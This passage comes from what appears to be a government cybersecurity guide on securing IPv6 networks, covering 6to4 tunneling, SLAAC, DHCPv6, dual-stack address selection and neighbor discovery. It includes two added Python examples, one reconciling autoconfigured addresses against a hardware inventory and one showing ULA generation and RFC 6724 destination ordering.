The <abbr title="Internet Engineering Task Force">IETF</abbr> designed “6to4” to provide automatic <abbr title="Internet Protocol version 6">IPv6</abbr>-over-<abbr title="Internet Protocol version 4">IPv4</abbr> tunneling to interconnect <abbr title="Internet Protocol version 6">IPv6</abbr> networks, while ISATAP is used to transmit <abbr title="Internet Protocol version 6">IPv6</abbr> packets between dual-stack nodes on an <abbr title="Internet Protocol version 4">IPv4</abbr> network. While these techniques and protocols may offer benefits, particularly during the transition phase, transporting <abbr title="Internet Protocol version 6">IPv6</abbr> packets over <abbr title="Internet Protocol version 4">IPv4</abbr> infrastructure can have security implications. These tunneling applications can be used to bypass network filtering policies. Organizations should implement mechanisms to block the use of default, automatic tunnels on end-user and perimeter devices (firewalls and edge routers). The Cyber Centre recommends using tunnel-aware security solutions. On network edge devices such as firewalls, organizations should deny by default all <abbr title="User Datagram Protocol">UDP</abbr> outbound traffic and implement exceptions for authorized services only<sup id="fn11-rf"><a class="fn-lnk" href="#fn11"><span class="wb-inv">Footnote </span>11</a></sup>.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.6">2.6 Default configurations</h3> <p>Modern operating systems (OS) and network devices will most likely support <abbr title="Internet Protocol version 6">IPv6</abbr> and, due to the standard’s requirements, this may be enabled by default. In addition, critical system functions may also require <abbr title="Internet Protocol version 6">IPv6</abbr> to be enabled. 
For example, Microsoft does not recommend disabling <abbr title="Internet Protocol version 6">IPv6</abbr> support on Windows <abbr title="Operating System">OS</abbr> devices, even when not in use <span class="nowrap"><sup id="fn5a-rf"><a class="fn-lnk" href="#fn5"><span class="wb-inv">Footnote </span>5</a></sup></span>. To understand and assess related risks, organizations should proactively review the default status of <abbr title="Internet Protocol version 6">IPv6</abbr> on their devices. Stay aware of risks associated with default configurations and design monitoring and preventative controls to mitigate those risks. For example, the 6to4 tunneling protocol is enabled by default on Windows servers when an interface is assigned a public <abbr title="Internet Protocol version 4">IPv4</abbr> address. The tunnel assigns and dynamically registers an <abbr title="Internet Protocol version 6">IPv6</abbr> address on the network<span class="nowrap"><sup id="fn12-rf"><a class="fn-lnk" href="#fn12"><span class="wb-inv">Footnote </span>12</a></sup></span>. If not monitored, this exposes the network to considerable risks. Organizations should implement mechanisms to drop unauthorized <abbr title="Internet Protocol version 6">IPv6</abbr> traffic flows. To mitigate threats associated with <abbr title="Internet Protocol version 6">IPv6</abbr> traffic transiting the network undetected, the Cyber Centre recommends proactive host-based monitoring for <abbr title="Internet Protocol version 6">IPv6</abbr> network communications, even when the network interface is disabled. 
Any unauthorized network traffic that is detected should be investigated.</p> </section><section><h3 class="mrgn-tp-xl" id="2.7">2.7 Unauthorized Internet Protocol version 6 traffic flows</h3> <p>Lack of visibility into <abbr title="Internet Protocol version 6">IPv6</abbr> traffic flows represents a considerable risk on the network. Organizations with no approved use for <abbr title="Internet Protocol version 6">IPv6</abbr> traffic should ensure <abbr title="Internet Protocol version 6">IPv6</abbr> traffic flows are filtered on network edge routers and firewalls according to their network policies. A network that has deployed <abbr title="Internet Protocol version 6">IPv6</abbr> should only allow <abbr title="Internet Protocol version 6">IPv6</abbr> traffic that is permitted by policy, with access control lists (ACL) allowing only authorized flows and protocols and blocking all others by default. When IPv6 is being deployed, depending on the business case, a threat and risk assessment (TRA) may be required to identify and mitigate associated risks. In some cases, it may be infeasible to fully disable IPv6 functionality even with no business use case. For example, Microsoft does not recommend disabling <abbr title="Internet Protocol version 6">IPv6</abbr> on Windows as some components require it to function properly. The Cyber Centre recommends a risk assessment to identify operational and security protections that could mitigate associated risks. 
In general, we recommend disabling <abbr title="Internet Protocol version 6">IPv6</abbr> except where there is an approved operational need for its use on the enterprise network <sup id="fn5b-rf"><a class="fn-lnk" href="#fn5"><span class="wb-inv">Footnote </span>5</a></sup>.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.8">2.8 Monitoring and management tools</h3> <p>Network management and monitoring tools require substantial updates to manage and support <abbr title="Internet Protocol version 6">IPv6</abbr> network traffic. Network security monitoring and reporting tools, such as an intrusion detection and prevention system (IDPS), log aggregation (via a security information and event management (SIEM) system), vulnerability scanners, and patch management tools, must support <abbr title="Internet Protocol version 6">IPv6</abbr> protocols to ensure ongoing compliance with organizational security policies. The Cyber Centre recommends that organizations prioritize testing for different network monitoring scenarios (dual-stack and <abbr title="Internet Protocol version 6">IPv6</abbr>-only) as part of their <abbr title="Internet Protocol version 6">IPv6</abbr> transition strategy. 
In addition, tailored test cases should be developed to validate support for <abbr title="Internet Protocol version 6">IPv6</abbr> for software and business service development-related activities.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.9">2.9 Addressing scheme</h3> <p>A robust <abbr title="Internet Protocol version 6">IPv6</abbr> addressing scheme increases the security of the network, while providing the flexibility to support business services and mitigate information leakage threats. Organizations should consider their network’s current state architecture as well as future needs when selecting an <abbr title="Internet Protocol version 6">IPv6</abbr> addressing plan. Considering the sophistication and interdependencies of modern networks and applications, an addressing plan which supports a phased and incremental approach to <abbr title="Internet Protocol version 6">IPv6</abbr> is recommended. An IP address management (IPAM) system is essential for effectively managing the addressing plan. Organizations should consider supported business applications and security policies when selecting an addressing scheme. The addressing plan can also be used to enhance an organization’s security posture, as a foundational means for separating networks, while enforcing the zero-trust principles of network segmentation and segregation. If considering Unique Local Addresses (ULAs), they must be generated following approved pseudorandom algorithms and should be filtered at the network boundaries and not exposed beyond the internal network. While <abbr title="Unique Local Addresses">ULA</abbr>s offer some benefits in <abbr title="Internet Protocol version 6">IPv6</abbr> deployments, we would not recommend their use in dual-stack environments. 
For <abbr title="Unique Local Addresses">ULA</abbr>s to be effective in dual-stack deployments, the address selection policy table precedence and label values may need to be updated on all devices on the network, introducing additional operational complexities and complicating network management and security processes.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.10">2.10 Multi-addressing support</h3> <p>A single <abbr title="Internet Protocol version 6">IPv6</abbr> interface can hold multiple addresses<sup id="fn13-rf"><a class="fn-lnk" href="#fn13"><span class="wb-inv">Footnote </span>13</a></sup>. For example, an interface loopback address, a link local address, a unique local address, or a globally routable address. By default, a network interface with <abbr title="Internet Protocol version 6">IPv6</abbr> is assigned a link local address. Multiple addresses offer both security and operational benefits; however, this can make it difficult to enforce network monitoring and filtering policies, particularly if filtering policies are not robust enough. This represents an increased threat surface and may allow threat actors to evade network traffic detection rules. The Cyber Centre recommends that system administrators implement restrictions on unauthorized changes to <abbr title="Internet Protocol version 6">IPv6</abbr> addresses and ensure that monitoring controls are in place to prevent and detect changes. 
To mitigate the threat of malicious actors evading network security policies, implement deny-by-default policies to ensure traffic to and from an interface is blocked on network boundaries except for traffic that is explicitly allowed by the organization’s network security policies.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.11">2.11 Dynamic Host Configuration Protocol for Internet Protocol version 6</h3> <p>Most enterprise networks rely on Dynamic Host Configuration Protocol (DHCP) for distributing <abbr title="Internet Protocol">IP</abbr> addressing information across the network. For <abbr title="Internet Protocol version 6">IPv6</abbr>, DHCP version 6 (DHCPv6)<sup id="fn14-rf"><a class="fn-lnk" href="#fn14"><span class="wb-inv">Footnote </span>14</a></sup> supports both stateless and stateful addressing for network devices. Like the traditional <abbr title="Dynamic Host Configuration Protocol">DHCP</abbr> protocol, <abbr title="Dynamic Host Configuration Protocol version 6">DHCPv6</abbr> is susceptible to a variety of attacks such as malicious intercept, spoofing, and <abbr title="Distributed Denial-of-Service">DDoS</abbr> attacks. For enterprise networks deploying <abbr title="Dynamic Host Configuration Protocol version 6">DHCPv6</abbr>, the Cyber Centre recommends protecting DHCP network messages by using <abbr title="Internet Protocol Security">IPsec</abbr> with encryption <sup id="fn6a-rf"><a class="fn-lnk" href="#fn6"><span class="wb-inv">Footnote </span>6</a></sup>. The Cyber Centre further recommends enabling authentication mechanisms between the <abbr title="Dynamic Host Configuration Protocol">DHCP</abbr> servers, relay hosts, and client endpoints. 
Organizations should also implement additional protections such as <abbr title="Dynamic Host Configuration Protocol version 6">DHCPv6</abbr> Guard<sup id="fn15-rf"><a class="fn-lnk" href="#fn15"><span class="wb-inv">Footnote </span>15</a></sup> to block malicious <abbr title="Dynamic Host Configuration Protocol">DHCP</abbr> reply and advertisement messages from unauthorized network devices. Organizations should consider <abbr title="Dynamic Host Configuration Protocol version 6">DHCPv6</abbr> failover<sup id="fn16-rf"><a class="fn-lnk" href="#fn16"><span class="wb-inv">Footnote </span>16</a></sup> capabilities to provide high-availability and protect against denial-of-service (DoS) attacks.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.12">2.12 Address autoconfiguration protections</h3> <p>The <abbr title="Internet Protocol version 6">IPv6</abbr> protocol specification allows devices to self-assign network addresses (i.e., interface identifiers (IIDs)) using the Stateless Address Autoconfiguration (SLAAC) protocol. As outlined in <a href="https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-119.pdf">NIST SP 800-119 Guidelines for the secure deployment of IPv6 (PDF)</a>, <abbr title="Stateless Address Autoconfiguration">SLAAC</abbr> relies on network information received from the router and the device <abbr title="Media Access Control">MAC</abbr> address and can allow threat actors to track <abbr title="Internet Protocol version 6">IPv6</abbr> endpoints. The Cyber Centre recommends disabling the use of <abbr title="Stateless Address Autoconfiguration">SLAAC</abbr>, particularly if a public addressing model is implemented. 
However, if an approved use case exists for <abbr title="Stateless Address Autoconfiguration">SLAAC</abbr>, the Cyber Centre recommends enabling <abbr title="Stateless Address Autoconfiguration">SLAAC</abbr> privacy extensions (which generate temporary <abbr title="Internet Protocol version 6">IPv6</abbr> addresses) for external communications outside the enterprise network (for example, with the Internet or third-party networks). Enabling <abbr title="Dynamic Host Configuration Protocol version 6">DHCPv6</abbr> temporary addressing can also provide the same protections as <abbr title="Stateless Address Autoconfiguration">SLAAC</abbr> privacy extensions. Please note that certain endpoints may not support <abbr title="Dynamic Host Configuration Protocol version 6">DHCPv6</abbr>, such as devices running on the Android OS, and may require self-configured <abbr title="Stateless Address Autoconfiguration">SLAAC</abbr> addressing as their only autoconfiguration option. In those scenarios, organizations should enable <abbr title="Dynamic Host Configuration Protocol version 6">DHCPv6</abbr> Address Registration as a mechanism for <abbr title="Stateless Address Autoconfiguration">SLAAC</abbr> devices to inform the <abbr title="Dynamic Host Configuration Protocol version 6">DHCPv6</abbr> server<sup id="fn17-rf"><a class="fn-lnk" href="#fn17"><span class="wb-inv">Footnote </span>17</a></sup> of the address they self-generated. However, note that this may not provide visibility into auto-configured devices that don’t support address registration or maliciously choose not to inform the <abbr title="Dynamic Host Configuration Protocol version 6">DHCPv6</abbr> server. 
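Where address registration cannot be relied on, an operator can still reconcile the autoconfigured addresses seen on the network against the hardware inventory, because a stable SLAAC address embeds the interface MAC in its modified EUI-64 interface identifier (RFC 4291), while privacy-extension, DHCPv6 and manual addresses do not. The Python below is an added example written for this page, not Cyber Centre code; the /64 prefix, inventory MACs and observed addresses are constructed sample data. It derives the expected SLAAC address for each inventoried MAC, recovers the embedded MAC from observed EUI-64 addresses, and sorts observed addresses into inventoried hosts still running without privacy extensions, unknown EUI-64 hosts, and addresses whose identifier is not MAC-derived.

```python
"""Reconcile autoconfigured (SLAAC) addresses against a hardware inventory.

Added example for this guidance page (not Cyber Centre code). Inventory MACs,
prefix and observed addresses are constructed sample data.
"""
import ipaddress

AUTHORIZED_EUI64 = "authorized-eui64"   # EUI-64 IID whose embedded MAC is in the inventory
UNKNOWN_EUI64 = "unknown-eui64"         # EUI-64 IID embedding a MAC not in the inventory
NON_EUI64 = "non-eui64"                 # temporary/random (privacy extension), DHCPv6 or manual IID


def eui64_from_mac(mac: str) -> bytes:
    """RFC 4291 modified EUI-64: insert ff:fe in the middle and invert the u/l bit (0x02)."""
    raw = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(raw) != 6:
        raise ValueError("expected a 48-bit MAC address")
    return bytes([raw[0] ^ 0x02]) + raw[1:3] + b"\xff\xfe" + raw[3:6]


def slaac_address(prefix: str, mac: str) -> str:
    """The stable SLAAC address a host with this MAC forms on a /64 (no privacy extensions)."""
    net = ipaddress.IPv6Network(prefix)
    if net.prefixlen != 64:
        raise ValueError("SLAAC interface identifiers are 64 bits; supply a /64 prefix")
    return str(ipaddress.IPv6Address(net.network_address.packed[:8] + eui64_from_mac(mac)))


def embedded_mac(addr: str):
    """Recover the MAC from an EUI-64 interface identifier, or None if the IID is not one."""
    iid = ipaddress.IPv6Address(addr).packed[8:]
    if iid[3:5] != b"\xff\xfe":
        return None
    raw = bytes([iid[0] ^ 0x02]) + iid[1:3] + iid[5:8]
    return ":".join(f"{b:02x}" for b in raw)


def reconcile(observed: list, inventory_macs: list) -> dict:
    """Map each observed address to (verdict, mac-or-None).

    EUI-64 identifiers are stable across networks and expose the NIC, which is
    why the guidance prefers privacy extensions or DHCPv6 temporary addressing.
    Unknown EUI-64 addresses point at devices the inventory does not know about.
    """
    known = {m.lower() for m in inventory_macs}
    report = {}
    for addr in observed:
        mac = embedded_mac(addr)
        if mac is None:
            report[addr] = (NON_EUI64, None)
        elif mac in known:
            report[addr] = (AUTHORIZED_EUI64, mac)
        else:
            report[addr] = (UNKNOWN_EUI64, mac)
    return report


# Constructed sample data.
SITE_PREFIX = "2001:db8:1::/64"
INVENTORY_MACS = ["00:11:22:33:44:55", "00:11:22:33:44:66"]
OBSERVED = [
    slaac_address(SITE_PREFIX, "00:11:22:33:44:55"),  # inventoried host without privacy extensions
    "2001:db8:1::2aa:bbff:fecc:ddee",                  # EUI-64 built from a MAC nobody inventoried
    "2001:db8:1:0:3c4e:9a1f:77d2:b15",                 # random IID: privacy extension or DHCPv6
]

if __name__ == "__main__":
    for addr, (verdict, mac) in reconcile(OBSERVED, INVENTORY_MACS).items():
        print(f"{addr:40} {verdict:18} {mac or ''}")
```

The unknown EUI-64 verdict is the one worth an alert: it is a device that autoconfigured itself on the link and is not in the inventory, which is exactly the visibility gap address registration leaves when a client does not, or will not, register.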
Organizations should implement network security controls to identify, manage and authorize network links with autoconfigured addresses.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.13">2.13 Dual-stack environments</h3> <p>Dual stacking is a cost-attractive proposition for organizations, allowing the use of existing <abbr title="Internet Protocol version 4">IPv4</abbr> infrastructure alongside <abbr title="Internet Protocol version 6">IPv6</abbr>. However, the need to maintain the <abbr title="Internet Protocol version 4">IPv4</abbr> infrastructure while onboarding new <abbr title="Internet Protocol version 6">IPv6</abbr> networks can increase the management burden and the attack surface. Dual-stack networks pose additional security concerns due to the use of multiple <abbr title="Internet Protocol">IP</abbr> stacks, which increases the attack surface and requires additional security controls to mitigate associated risks. Dual-stacked host endpoints in particular present higher security challenges. Endpoint controls must have addressing controls for both <abbr title="Internet Protocol version 4">IPv4</abbr> and <abbr title="Internet Protocol version 6">IPv6</abbr> addressing schemes, which introduces additional complexity. The Cyber Centre recommends that organizations consider restricting host endpoints to single <abbr title="Internet Protocol">IP</abbr> stack solutions (<abbr title="Internet Protocol version 4">IPv4</abbr>-only or <abbr title="Internet Protocol version 6">IPv6</abbr>-only). Limiting dual-stack architectures to transition mechanisms, switches, routers, or network gateways will help reduce the attack surface. 
Organizations should ensure that network or application firewalls are aware of and capable of filtering both <abbr title="Internet Protocol version 4">IPv4</abbr> and <abbr title="Internet Protocol version 6">IPv6</abbr> network packets.</p> <p>The <abbr title="Internet Protocol version 6">IPv6</abbr> specification standard establishes precedence rules which govern dual-stack interfaces. According to the <abbr title="Internet Engineering Task Force">IETF</abbr>’s request for comments (RFC) 6724 publication, <a href="https://www.rfc-editor.org/rfc/rfc6724">default address selection for Internet Protocol Version 6</a>, configured default policies may prioritize specific address groups over others, thereby leading to network operational complexities. This can have operational and security implications within dual-stack networks. Network and security administrators should be aware of address-selection precedence values deployed within their network environment. Administrators should also review and approve address-selection policies and ensure they are aligned with their network security objectives. Network security devices, including firewalls, edge routers, and gateways, should implement filtering policies to prevent unauthorized inbound or outbound <abbr title="Internet Protocol version 4">IPv4</abbr> and <abbr title="Internet Protocol version 6">IPv6</abbr> traffic.</p> <p>In dual-stack <abbr title="Domain Name System">DNS</abbr> environments, A records (used to map domain names to <abbr title="Internet Protocol version 4">IPv4</abbr> addresses) and AAAA records (used to map domain names to <abbr title="Internet Protocol version 6">IPv6</abbr> addresses) are crucial for maintaining services. 
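When a dual-stack resolver returns both an A and an AAAA record, the host's RFC 6724 policy table decides which destination it tries first, and the default table ranks ULA destinations (precedence 3) below IPv4-mapped ones (precedence 35); that is the operational reason section 2.9 gives for avoiding ULAs in dual-stack networks unless every host's policy table is changed. The Python below is an added example written for this page, not Cyber Centre code: it generates a ULA /48 with the RFC 4193 pseudorandom method and then applies RFC 6724 rule 6 (the precedence rule only; the full algorithm has ten rules) to show that the ordering flips only after a site-specific policy row, here an assumed precedence of 45 and label 14, is pushed to the host. The EUI-64, timestamp and candidate addresses are constructed values.

```python
"""ULA generation (RFC 4193) and why ULAs lose to IPv4 in dual stack (RFC 6724).

Added example for this guidance page (not Cyber Centre code). The EUI-64,
timestamp and candidate destinations below are constructed sample values.
"""
import hashlib
import ipaddress
import struct
import time
from typing import Optional

NTP_EPOCH_OFFSET = 2_208_988_800   # seconds from 1900-01-01 (NTP epoch) to 1970-01-01 (Unix epoch)


def ntp_timestamp(unix_time: float) -> bytes:
    """64-bit NTP timestamp: 32-bit seconds since 1900 plus a 32-bit fraction (RFC 4193 step 1)."""
    whole = int(unix_time)
    frac = int((unix_time - whole) * (1 << 32))
    return struct.pack("!II", (whole + NTP_EPOCH_OFFSET) & 0xFFFFFFFF, frac & 0xFFFFFFFF)


def generate_ula_prefix(eui64: bytes, unix_time: Optional[float] = None) -> ipaddress.IPv6Network:
    """RFC 4193 section 3.2.2: Global ID = low 40 bits of SHA-1(NTP time || EUI-64), under fd00::/8."""
    if len(eui64) != 8:
        raise ValueError("EUI-64 must be 8 bytes")
    if unix_time is None:
        unix_time = time.time()
    digest = hashlib.sha1(ntp_timestamp(unix_time) + eui64).digest()
    global_id = int.from_bytes(digest[-5:], "big")   # least significant 40 bits of the digest
    prefix = (0xFD << 120) | (global_id << 80)       # fc00::/7 with L=1, then Global ID, subnet ID zero
    return ipaddress.IPv6Network(f"{ipaddress.IPv6Address(prefix)}/48")


# RFC 6724 section 2.1 default policy table: (prefix, precedence, label).
DEFAULT_POLICY = [
    ("::1/128", 50, 0),
    ("::/0", 40, 1),
    ("::ffff:0:0/96", 35, 4),   # IPv4 destinations, handled as IPv4-mapped addresses
    ("2002::/16", 30, 2),
    ("2001::/32", 5, 5),
    ("fc00::/7", 3, 13),        # ULA: lower precedence than IPv4
    ("::/96", 1, 3),
    ("fec0::/10", 1, 11),
    ("3ffe::/16", 1, 12),
]


def policy_lookup(addr: str, policy=DEFAULT_POLICY) -> tuple:
    """Longest-prefix match into the policy table; returns (precedence, label)."""
    a = ipaddress.IPv6Address(addr)
    best = None
    for prefix, precedence, label in policy:
        net = ipaddress.IPv6Network(prefix)
        if a in net and (best is None or net.prefixlen > best[0]):
            best = (net.prefixlen, precedence, label)
    return best[1], best[2]


def _as_v6(dst: str) -> str:
    """RFC 6724 treats IPv4 destinations as IPv4-mapped IPv6 addresses."""
    a = ipaddress.ip_address(dst)
    return f"::ffff:{a}" if a.version == 4 else str(a)


def order_destinations(destinations: list, policy=DEFAULT_POLICY) -> list:
    """Sort candidate destinations by RFC 6724 rule 6 (prefer higher precedence).

    Only rule 6 of the ten destination rules is applied, which is enough to show
    the ULA-versus-IPv4 effect; the stable sort keeps input order among ties.
    """
    return sorted(destinations, key=lambda d: -policy_lookup(_as_v6(d), policy)[0])


def prefer_site_ula(policy: list, ula_prefix: ipaddress.IPv6Network,
                    precedence: int = 45, label: int = 14) -> list:
    """Site-specific row (precedence above IPv4's 35) that every dual-stack host would have to carry."""
    return [(str(ula_prefix), precedence, label)] + list(policy)


if __name__ == "__main__":
    site = generate_ula_prefix(bytes.fromhex("0211223344556677"), unix_time=1_700_000_000.0)
    ula_host = str(site.network_address + 1)
    candidates = [ula_host, "192.0.2.1", "2001:db8::1"]
    print("site ULA prefix:", site)
    print("default policy: ", order_destinations(candidates))
    print("ULA preferred:  ", order_destinations(candidates, prefer_site_ula(DEFAULT_POLICY, site)))
```

With the default table the global IPv6 destination comes first, the IPv4 destination second and the ULA last; only the added site row moves the ULA ahead, and that row has to exist on every host, which is the management burden the guidance warns about.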
For Internet-exposed networks, the Cyber Centre recommends that organizations use separate <abbr title="Domain Name System">DNS</abbr> infrastructure for internal and external <abbr title="Internet Protocol version 4">IPv4</abbr> and <abbr title="Internet Protocol version 6">IPv6</abbr> networks (also known as split <abbr title="Domain Name System">DNS</abbr> architecture). This is to ensure the stability of system applications, increase security, and preserve the privacy of enterprise network data. For more information on split DNS architecture, read the <abbr title="National Security Agency">NSA</abbr>’s <a href="https://www.nsa.gov/press-room/news-highlights/article/article/3270451/nsa-publishes-internet-protocol-version-6-ipv6-security-guidance/">Internet Protocol Version 6 Security Guidance</a>.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.14">2.14 Protection of data and management planes</h3> <p>Network administrative communications for <abbr title="Internet Protocol version 6">IPv6</abbr> environments should be protected against eavesdropping, sniffing, and similar threats. The Cyber Centre recommends separating the management plane from the data plane using mechanisms such as virtual local area network (VLAN) separation or firewall filtering. <abbr title="access control lists">ACL</abbr>s, Intrusion Prevention Systems (IPS), and layer-2 filtering should also be used to protect the network management plane devices. For higher sensitivity networks, physical and cryptographic separation is highly recommended, for example, separation of management and data planes. The Cyber Centre further recommends that organizations use <abbr title="Internet Protocol Security">IPsec</abbr> to protect <abbr title="Internet Protocol version 6">IPv6</abbr> communications. 
Only CSE-approved cryptographic algorithms should be used, as indicated in the Cyber Centre’s publication <a href="https://www.cyber.gc.ca/en/guidance/cryptographic-algorithms-unclassified-protected-protected-b-information-itsp40111">Cryptographic algorithms for UNCLASSIFIED, PROTECTED A, and PROTECTED B information (ITSP.40.111)</a>. Control plane protocols for <abbr title="Internet Protocol version 6">IPv6</abbr> networks include <abbr title="Neighbor Discovery">ND</abbr>, <abbr title="Dynamic Host Configuration Protocol">DHCP</abbr>, Border Gateway Protocol (BGP), Network Time Protocol (NTP), and others. Organizations should consider implementing network filtering security controls. These controls will prevent control plane messages from inadvertently leaking information and disable or block unauthorized control plane protocols.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.15">2.15 Neighbor discovery messages</h3> <p>Neighbor discovery (ND)<sup id="fn18-rf"><a class="fn-lnk" href="#fn18"><span class="wb-inv">Footnote </span>18</a></sup> in the <abbr title="Internet Protocol version 6">IPv6</abbr> specification is similar to the Address Resolution Protocol (ARP) used by <abbr title="Internet Protocol version 4">IPv4</abbr>. <abbr title="Neighbor Discovery">ND</abbr> is used to manage crucial <abbr title="Internet Protocol version 6">IPv6</abbr> capabilities such as address autoconfiguration, address resolution, duplicate address detection and others. However, the <abbr title="Neighbor Discovery">ND</abbr> protocol is susceptible to several attacks<sup id="fn19-rf"><a class="fn-lnk" href="#fn19"><span class="wb-inv">Footnote </span>19</a></sup> and can also be used by threat actors to perform address spoofing or poisoning attacks. 
The Cyber Centre recommends implementing network products which support cryptographic protections for <abbr title="Neighbor Discovery">ND</abbr> such as Secure Neighbor Discovery (SEND). Cryptographic signatures generated through <abbr title="Secure Neighbor Discovery">SEND</abbr> are used to validate and verify <abbr title="Neighbor Discovery">ND</abbr> messages, protecting against address spoofing attacks. Enabling <abbr title="Internet Protocol Security">IPsec</abbr> can help secure <abbr title="Neighbor Discovery">ND</abbr> messages. It is also advisable to filter <abbr title="Neighbor Discovery">ND</abbr> messages (i.e., Internet Control Message Protocol version 6 (ICMPv6)) on external network boundary gateways except those required for <abbr title="Internet Protocol version 6">IPv6</abbr> network connectivity. Please refer to RFC 4890<sup id="fn20-rf"><a class="fn-lnk" href="#fn20"><span class="wb-inv">Footnote </span>20</a></sup> for guidance on filtering <abbr title="Internet Control Message Protocol version 6">ICMPv6</abbr> messages in firewalls.</p> </section><section><h3 class="mrgn-tp-xl" id="2.16">2.16 Address translation risks</h3> <p>Address translation and tunneling of <abbr title="Internet Protocol version 4">IPv4</abbr> over <abbr title="Internet Protocol version 6">IPv6</abbr> and vice versa can introduce additional risks. Translation devices can be a single point of failure and therefore high-availability and redundancy protections should be included as part of their architecture whenever they are deployed. 
Translation interfaces also force the termination of security mechanisms such as IPsec and Domain Name System Security Extensions (DNSSEC).</p> <p>Network Address Translation-Protocol Translation (NAT-PT)<sup id="fn21-rf"><a class="fn-lnk" href="#fn21"><span class="wb-inv">Footnote </span>21</a></sup> is a common translation mechanism that allows <abbr title="Internet Protocol version 4">IPv4</abbr>-only devices to communicate with <abbr title="Internet Protocol version 6">IPv6</abbr>-only devices. The Cyber Centre does not recommend using NAT-PT to communicate between <abbr title="Internet Protocol version 6">IPv6</abbr>-only networks via an <abbr title="Internet Protocol version 4">IPv4</abbr> backbone or vice versa because of availability and end-to-end security concerns. Organizations can consider NAT64 (stateful<sup id="fn22-rf"><a class="fn-lnk" href="#fn22"><span class="wb-inv">Footnote </span>22</a></sup> Network Address Translation for <abbr title="Internet Protocol version 6">IPv6</abbr>-only clients to reach <abbr title="Internet Protocol version 4">IPv4</abbr> servers) alongside DNS64 (a mechanism for synthesizing <abbr title="Domain Name System">DNS</abbr> AAAA records from A records)<sup id="fn23-rf"><a class="fn-lnk" href="#fn23"><span class="wb-inv">Footnote </span>23</a></sup> or 464XLAT (a combination of stateful and stateless<sup id="fn24-rf"><a class="fn-lnk" href="#fn24"><span class="wb-inv">Footnote </span>24</a></sup> translation for <abbr title="Internet Protocol version 4">IPv4</abbr> connectivity across <abbr title="Internet Protocol version 6">IPv6</abbr>-only networks)<sup id="fn25-rf"><a class="fn-lnk" href="#fn25"><span class="wb-inv">Footnote </span>25</a></sup>.</p> </section><section><h3 class="mrgn-tp-xl" id="2.17">2.17 Zero trust architecture</h3> 
<p>Zero trust architecture (ZTA) is built on the foundational security principle of eliminating implicit trust within the enterprise network. Zero trust assumes no inherent trust for resources and thus requires each resource (application, device, user, and network interface) to be uniquely identified, authenticated, and authorized.</p> <p>The <abbr title="Internet Protocol version 6">IPv6</abbr> standard provides foundational capabilities for the implementation of zero trust. These capabilities include an expanded address space, multiple addresses per interface, and IPsec extension headers for source authentication, data integrity and data confidentiality.</p> <p>A multiple addressing strategy can be used to identify devices, interfaces or applications on the network, providing foundational support for micro-segmentation. This makes micro-segmentation easier, allowing traffic flows to be managed through fine-grained network access control lists.</p> <p>Additionally, organizations can leverage <abbr title="Internet Protocol version 6">IPv6</abbr> extension headers by enabling IPsec to achieve secure end-to-end <abbr title="Internet Protocol">IP</abbr> communications. Enabling IPsec provides interface authentication and end-to-end confidentiality and integrity protections for data and control messages on the network.</p> </section><section><h3 class="mrgn-tp-xl" id="2.18">2.18 Technical and operational depth</h3> <p>The lack of technical understanding and operational expertise in <abbr title="Internet Protocol version 6">IPv6</abbr> represents a significant challenge for many organizations. Few network engineers possess detailed knowledge of the <abbr title="Internet Protocol version 6">IPv6</abbr> specification standards. 
To build the technical competencies required for the future, organizations should invest in training networking and security professionals on <abbr title="Internet Protocol version 6">IPv6</abbr> and its capabilities. Organizations should also develop expertise by exploring <abbr title="Internet Protocol version 6">IPv6</abbr> capabilities within dedicated network labs and/or limited pilot deployments. Organizations are encouraged to strengthen technical competencies and capabilities required to ensure network performance, address network design and operational issues, and architect security requirements.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h2 class="text-info mrgn-tp-xl" id="3">3 Conclusion</h2> <p>The challenges associated with limited <abbr title="Internet Protocol version 4">IPv4</abbr> addresses are likely to increase. <abbr title="Internet Protocol version 6">IPv6</abbr> is designed to address these issues and offer additional security benefits. Modern networking stacks prioritize <abbr title="Internet Protocol version 6">IPv6</abbr>, conforming with the <abbr title="Internet Engineering Task Force">IETF</abbr> specification standard, and organizational network enterprise strategies must be updated to manage associated risks. Traditional security controls that were built around <abbr title="Internet Protocol version 4">IPv4</abbr> addressing, such as monitoring capabilities for example, will require updates and re-alignment. 
